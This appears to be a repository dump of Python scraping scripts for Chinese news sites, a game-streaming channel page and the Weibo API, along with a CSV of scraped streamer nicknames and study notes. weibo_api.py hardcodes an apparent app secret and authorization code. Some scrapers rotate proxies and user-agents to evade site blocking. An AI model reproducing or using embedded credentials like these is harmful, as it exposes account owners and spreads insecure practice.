requests.get(url, headers=user_agent.UserAgent().getRandomHeaders(), proxies = random_ip.RandomIp().getOneProxies()) 22 | html = re.text 23 | struct = etree.HTML(html) 24 | 25 | # with open("newUrl.txt",'w',encoding='utf-8') as f: 26 | # f.write(html) 27 | 28 | for i in range(1, 21): 29 | newName = struct.xpath('//*[@id="bd"]/div[1]/div/ul/li[' + str(i) + ']/h3/div/a/text()') 30 | href = struct.xpath('//*[@id="bd"]/div[1]/div/ul/li[' + str(i) + ']/h3/div/a/@href') 31 | print(newName, href) 32 | 33 | for i in range(1, 25): 34 | newName1 = struct.xpath('//*[@id="bd"]/div[2]/div/ul/li[' + str(i) + ']/h3/div/a/text()') 35 | href1 = struct.xpath('//*[@id="bd"]/div[2]/div/ul/li[' + str(i) + ']/h3/div/a/@href') 36 | print(newName1, href1) -------------------------------------------------------------------------------- /spider/news/new_pengpai.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/4/6 22:46 8 | @File : new_pengpai.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ 14 | 15 | import requests 16 | import random_ip 17 | import user_agent 18 | from lxml import etree 19 | from bs4 import BeautifulSoup as bs 20 | 21 | # url = "https://www.thepaper.cn/channel_25951" 22 | # 23 | # proxies = randomIp.RandomIp().getOneProxies() 24 | # headers = userAgent.UserAgent().getRandomHeaders() 25 | # 26 | # re = requests.get(url, headers=headers, proxies=proxies) 27 | # html = re.text 28 | # with open("re.txt","w",encoding="utf-8") as f: 29 | # f.write(html) 30 | 31 | with open("re.txt","r",encoding="utf-8") as f: 32 | content = f.read() 33 | 34 | soup = bs(content,"html.parser") 35 | aList = soup.find_all("a") 36 | for a in aList: 37 | print(a.get('href')) 38 | 
-------------------------------------------------------------------------------- /spider/news/wallstreetcn.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 华尔街见闻 6 | -------------------------------- 7 | @Time : 2019/5/13 22:16 8 | @File : wallstreetcn.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ 14 | 15 | import requests 16 | 17 | # 先拿到网页中要爬取部分的所有链接 18 | # url去重 19 | # scarpy-reids 20 | # 读取字段写到数据库 21 | 22 | # targetUrl = "https://wallstreetcn.com/kechuang" 23 | # 24 | # re = requests.get(targetUrl) 25 | # re.encoding=re.apparent_encoding 26 | # html = re.text 27 | # 28 | # with open("html.txt","w",encoding="utf-8") as f: 29 | # f.write(str(html)) 30 | 31 | import re 32 | import json 33 | 34 | 35 | def getWallstreetData(): 36 | with open("html.txt", "r", encoding="utf-8") as f: 37 | html = f.read() 38 | 39 | # 匹配获取文章列表页数据 40 | parten = r'' 41 | res = re.findall(parten, html) 42 | 43 | # 匹配结果转换成字典 44 | dictinfo = str2dict(res[0]) 45 | cachedResponseDic = dictinfo['cachedResponse'] 46 | 47 | # 遍历字典,匹配key 48 | for key, value in cachedResponseDic.items(): 49 | if "information-flow" in key: 50 | nextCursor = value.get('value').get('next_cursor') 51 | items = value.get('value').get('items') 52 | return nextCursor, items 53 | 54 | 55 | # json格式的字符串转换成字典(json) 56 | def str2dict(str): 57 | return json.loads(str) 58 | 59 | 60 | # dict中的数据入库 61 | def data2oracle(dict): 62 | print(dict) 63 | 64 | 65 | # 获取url的text 66 | def requestUrl(url): 67 | re = requests.get(url) 68 | re.encoding = re.apparent_encoding 69 | return re.text 70 | 71 | 72 | # 爬取指定个数的数据 73 | def getLimitData(url): 74 | returnJsonStr = requestUrl(url) 75 | jsonDict = str2dict(returnJsonStr) 76 | items = jsonDict['data']['items'] 77 | return items 78 | 79 | 80 | # 解析文章的详细信息,返回详细信息的字典 
81 | def getArticleDetail(url): 82 | html = requestUrl(url) 83 | pass 84 | 85 | 86 | if __name__ == '__main__': 87 | nextCursor, pre20Items = getWallstreetData() 88 | 89 | # limit = 10 # 返回个数 90 | # url = "https://api.wallstreetcn.com/apiv1/content/information-flow?channel=kechuang&accept=article%2Cad&cursor=" + nextCursor + "&limit=" + str(limit) 91 | # allItems = pre20Items.extend(getLimitData(url)) 92 | # print(allItems) 93 | 94 | 95 | allItems = [] 96 | 97 | # 遍历所有items,合并所有信息,入库 98 | for itemDic in allItems: 99 | print(itemDic) 100 | detailDic = getArticleDetail(itemDic['resource']['uri']) 101 | 102 | # 合并两个字典itemDic与detailDic,返回最终结果入库 103 | result = {} 104 | 105 | # 已有的信息与详细信息合并后,数据入库 106 | data2oracle(result) 107 | -------------------------------------------------------------------------------- /spider/pachong/geckodriver.log: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yaojin-li/Python/080d720fc6248af04b4b20f9988c115f6aff8e81/spider/pachong/geckodriver.log -------------------------------------------------------------------------------- /spider/pachong/get_dynamic_data.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : selenium获取页面动态内容 6 | -------------------------------------- 7 | @File : get_dynamic_data.py 8 | @Time : 2018/4/26 16:55 9 | @Software : PyCharm 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | from selenium import webdriver 17 | from selenium.webdriver.chrome.options import Options 18 | from selenium.webdriver.common.desired_capabilities import DesiredCapabilities 19 | from bs4 import BeautifulSoup as bs 20 | from pandas import DataFrame 21 | import time 22 | 23 | 24 | ## 1. 
动态抓取页面 25 | chrome_options = webdriver.ChromeOptions() 26 | chrome_options.add_argument('--headless') 27 | chrome_options.add_argument('--disable-gpu') 28 | 29 | 30 | ## 2. 更改user-agent 31 | # chrome_options.add_argument('--user-agent=Mozilla/5.0 (iPad; CPU OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3') 32 | # chrome_options.add_argument('--user-agent=Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3') 33 | # chrome_options.add_argument('--user-agent=Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1') 34 | chrome_options.add_argument('--user-agent=Mozilla/5.0 (Linux; U; Android 4.0.2; en-us; Galaxy Nexus Build/ICL53F) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') 35 | 36 | driver = webdriver.Chrome(chrome_options=chrome_options) 37 | # PhantomJS 目前标记为不赞成,在未来版本中可能不支持,改用chrome的headless chrome 38 | # driver = webdriver.PhantomJS(executable_path="./phantomjs/bin/phantomjs") 39 | 40 | url = "https://www.huomao.com/channel/lol" 41 | 42 | # 获取页面全部内容 43 | driver.get(url) 44 | data = driver.page_source 45 | print(len(data)) 46 | 47 | # 获取网页截图 48 | # driver.save_screenshot("./screenshot/1.png") 49 | 50 | 51 | ## 3. 保存爬取内容到本地分析! 52 | with open("./page_source.txt", "w", encoding="utf-8") as f: 53 | f.write(driver.page_source) 54 | 55 | driver.quit() 56 | 57 | 58 | ## 4. 
分析 59 | page_source = '' # 本地文件内容代替爬取结果str类型 60 | with open("./page_source.txt", "r", encoding="utf-8") as f: 61 | page_source = f.read() 62 | 63 | # 存储最终分析结果 64 | name = [] 65 | title = [] 66 | watching = [] 67 | 68 | # 开始解析 69 | soup = bs(page_source, "html.parser") 70 | channelList = soup.find("div", attrs={'id':"channellist"}) 71 | rooms = channelList.find_all("div", attrs={'class':"list-smallbox no-logo"}) 72 | # 获取每个房间中的主播信息 73 | for room in rooms: 74 | try: 75 | this_title = room.find("a")["title"] # title当作a的属性获取 76 | this_name = room.find("span", class_="nickname").text # bs 解析标签中的值 77 | this_watching = room.find("em", attrs={"class":"flr"}).find("span").text 78 | except: 79 | this_watching = room.find("div", class_="no-playing").text 80 | name.append(this_name) 81 | title.append(this_title) 82 | watching.append(this_watching) 83 | 84 | result = DataFrame({ 85 | "主播名":name, 86 | "节目名":title, 87 | "观看人数":watching 88 | }) 89 | 90 | result.to_csv("./result.csv", encoding = "utf_8_sig") 91 | -------------------------------------------------------------------------------- /spider/pachong/result.csv: -------------------------------------------------------------------------------- 1 | ,主播名,节目名,观看人数 2 | 0,猓狐狸°,【第一女刺客】你看见过我的小熊吗~,"6,163" 3 | 1,齐天小小圣,晚上闹一会儿天宫吧~,289 4 | 2,MrIvan,老司机带飞,2 5 | 3,、小许,这个主播有点皮,主播正在休息 6 | 4,-你心中的玮哥哥,很久不见。,主播正在休息 7 | 5,鱼长官卡兹克,祖安王者局.,主播正在休息 8 | 6,慕薛丶今年15,想我了来q群找我:167569325,主播正在休息 9 | 7,宿命小磊,问道爆发,主播正在休息 10 | 8,居委会K某人,贾克斯的故事第69集,主播正在休息 11 | 9,MonicaOvO,未来人类品牌日 DRvsPDQ,主播正在休息 12 | 10,旺仔大馒头,带你们看火狐大美妞,主播正在休息 13 | 11,EWG女子电竞,EWG-LOL,主播正在休息 14 | 12,末路^_^,雨里夜里,峡谷之巅等你。,主播正在休息 15 | 13,Yas1n,网四钻石AD辅助冲分,主播正在休息 16 | 14,我的EZ会发光哟,电一王者峡谷上分 目前钻1,主播正在休息 17 | 15,DAi黛王巡山,【黛】帮我想个标题吧,主播正在休息 18 | 16,lime,【光家族】有你们是我的骄傲^_^,主播正在休息 19 | 17,魔女小娜迦,老板屋内位子随便上,主播正在休息 20 | 18,✿๓浅浅,一个不会翻车的女司机(・(ェ)・),主播正在休息 21 | 19,隔壁老王丶1,ob韩服王者局,主播正在休息 22 | 20,国服第一米老鼠,定个小目标,今天8把鸡。,主播正在休息 23 | 21,佳璐是个小仙女,皮城小仙女 佳璐璐哦,主播正在休息 24 | 22,跳儿,网一直播掉分儿,主播正在休息 25 | 23,狼狼不是娘娘酱,狼酱:别人凭本事拿的人头,为啥说我送?,主播正在休息 26 | 
24,FANGQING丶,网1钻石AD,主播正在休息 27 | 25,Da丶新,新仔的菜鸟之路~~~~,主播正在休息 28 | 26,小智齿,火猫最强辅助莫甘娜 一Q一个男朋友,主播正在休息 29 | 27,蓝花楹,蓝花楹,主播正在休息 30 | 28,江湖人称一条柴,12345678,主播正在休息 31 | 29,OopsLeo,10把定位,主播正在休息 32 | 30,我叫该隐,人马:学会上不了钻石请举报我!,主播正在休息 33 | 31,小进进i,小进进:火猫第一德莱文,主播正在休息 34 | 32,青椒ccccccccccc,绝对有你意想不到的惊喜!!,主播正在休息 35 | 33,Star.Still,新人女主播,主播正在休息 36 | 34,小安萌啊-承承,我的直播间,主播正在休息 37 | 35,主播Carry丶锋,锐文专场!,主播正在休息 38 | 36,冷锋UU,小丑皇的无情杀戮,主播正在休息 39 | 37,二娜丶,【二娜】牙疼,主播正在休息 40 | 38,一个人的游戏.,中单专场,主播正在休息 41 | 39,电竞潇洒哥,其实躺赢也是门技术,主播正在休息 42 | 40,三斧子不解释,玩会LOL,主播正在休息 43 | 41,7777智障肉肉,ADC与辅助的爱恨情仇,主播正在休息 44 | 42,火猫丶TVForsake,火猫丶TVForsake,主播正在休息 45 | 43,古力逗,没有技术可言 送仙豆的都是大哥,主播正在休息 46 | 44,蓝俊熙丶,看一波电影,主播正在休息 47 | 45,雨晨姑奶奶,手受伤过几天开摄像头,主播正在休息 48 | 46,丑的被嫉妒,丑怪:不是技术 却很皮,主播正在休息 49 | 47,温柔风亚索,.......,主播正在休息 50 | 48,泽拉图丶,泽拉图:土嗨主播上路英雄海,主播正在休息 51 | 49,An阿南。,ADC 小王子。,主播正在休息 52 | 50,李梓煜,李梓煜 新主播求订阅,主播正在休息 53 | 51,月半湾丶小帅,新人主播求订阅,主播正在休息 54 | 52,我其实很懒,一区钻5单排上分,主播正在休息 55 | 53,空城丶智少,中路,主播正在休息 56 | 54,【文帝】,阴阳判官德莱文,主播正在休息 57 | 55,bewhy!,dddd~~~,主播正在休息 58 | 56,东北昊天,东北昊天:户外,唠嗑来。,主播正在休息 59 | 57,广东丶隔壁老黄,练下JJ~,主播正在休息 60 | 58,单纯主播蓄蓄,四月活动收礼只收“萌”2角一个!,主播正在休息 61 | 59,请叫我大C,征服之海,主播正在休息 62 | -------------------------------------------------------------------------------- /spider/pachong/screenshot/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yaojin-li/Python/080d720fc6248af04b4b20f9988c115f6aff8e81/spider/pachong/screenshot/1.png -------------------------------------------------------------------------------- /spider/pachong/screenshot/bottom.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yaojin-li/Python/080d720fc6248af04b4b20f9988c115f6aff8e81/spider/pachong/screenshot/bottom.jpg -------------------------------------------------------------------------------- /spider/pachong/笔记.txt: -------------------------------------------------------------------------------- 1 | 2 | Selenium + Chrome Driver 
操作爬取过程 3 | 4 | 问题: 5 | 1. PhantomJS 运行时标记为不赞成 6 | 解决方法:使用Headless Chrome替换 7 | 参考网页:https://blog.csdn.net/visual0522/article/details/79343917 8 | 9 | 2. 下载对应chrome 版本的chromedriver下载安装: 10 | 注:查看chrome版本,前两位对应版本号;将chrome driver添加到PATH系统路径中 11 | 参考网页:https://blog.csdn.net/huilan_same/article/details/51896672 12 | 13 | 3. bs解析 14 | this_title = room.find("a")["title"] # title当作a的属性获取 15 | this_name = room.find("span", class_="nickname").text # bs 解析标签中的值 16 | 17 | 主要区别: 18 | 1. 在使用动态网页爬取神器Selenium爬取网页时,获得的时网页的全部内容,包括实时显示更新的数据; 19 | 一般在静态页面中无法获取。 20 | 21 | 2. 在代码的编写上,主要区别在于最初获取页面内容上,主要使用webdriver.Chrome()获取目标页面的全部内容 22 | 其余部分的解析、提取关键内容,同静态页面的提取、解析方式相同。 23 | 24 | 参考连接: 25 | 1. 26 | python+Selenium2+chrome构建动态网页爬虫工具 https://blog.csdn.net/cjsafty/article/details/9206323 27 | 28 | 2. 29 | python中selenium操作下拉滚动条方法汇总 https://www.cnblogs.com/landhu/p/5761794.html 30 | 31 | 3. 32 | python+selenium+PhantomJS爬取网页动态加载内容 https://www.cnblogs.com/chenice/p/6994111.html 33 | (PhantomJS中的部分内容可用,仅参考driver之后的相关函数使用) 34 | 35 | -------------------------------------------------------------------------------- /spider/spider.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yaojin-li/Python/080d720fc6248af04b4b20f9988c115f6aff8e81/spider/spider.zip -------------------------------------------------------------------------------- /spider/wechat/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/6/7 15:21 8 | @File : __init__.py.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ -------------------------------------------------------------------------------- /spider/weibo/__init__.py: 
-------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/4/14 18:39 8 | @File : __init__.py.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ -------------------------------------------------------------------------------- /spider/weibo/weibo_api.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/4/14 18:40 8 | @File : weiboAPI.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ 14 | 15 | from weibo import APIClient 16 | 17 | # 1.配置 18 | APP_KEY = '4073142975' 19 | APP_SECRET = '6e8a766757e8ae11b06f0e0bfc26b291' 20 | CALLBACK_URL = 'http://apps.weibo.com/heyshheyou' # 回调授权页面,用户完成授权后返回的页面 21 | 22 | # 2.调用APIClient生成client实例 23 | client = APIClient(app_key=APP_KEY, app_secret=APP_SECRET, redirect_uri=CALLBACK_URL) 24 | 25 | # 3.得到授权页面的url 26 | url = client.get_authorize_url() 27 | print(url) 28 | 29 | # 4.点击访问url,在浏览器端获得code 30 | code = '6ecdbf350f0680a6f00cc8c34ae721a6' 31 | req = client.request_access_token(code) 32 | client.set_access_token(req.get('access_token'), req.get('expires_in')) 33 | 34 | # 5.调用微博普通读取接口,返回最新的公共微博。 35 | # 接口详情见 https://open.weibo.com/wiki/2/statuses/public_timeline 36 | statuses = client.statuses__public_timeline()['statuses'] 37 | print(len(statuses)) 38 | # 6.输出部分信息 39 | for i in range(0, len(statuses)): 40 | print(u'昵称:' + statuses[i]['user']['screen_name']) 41 | print(u'简单介绍:' + statuses[i]['user']['description']) 42 | print(u'位置:' + statuses[i]['user']['location']) 43 | print(u'微博:' + 
statuses[i]['text']) 44 | print(statuses[i]) 45 | --------------------------------------------------------------------------------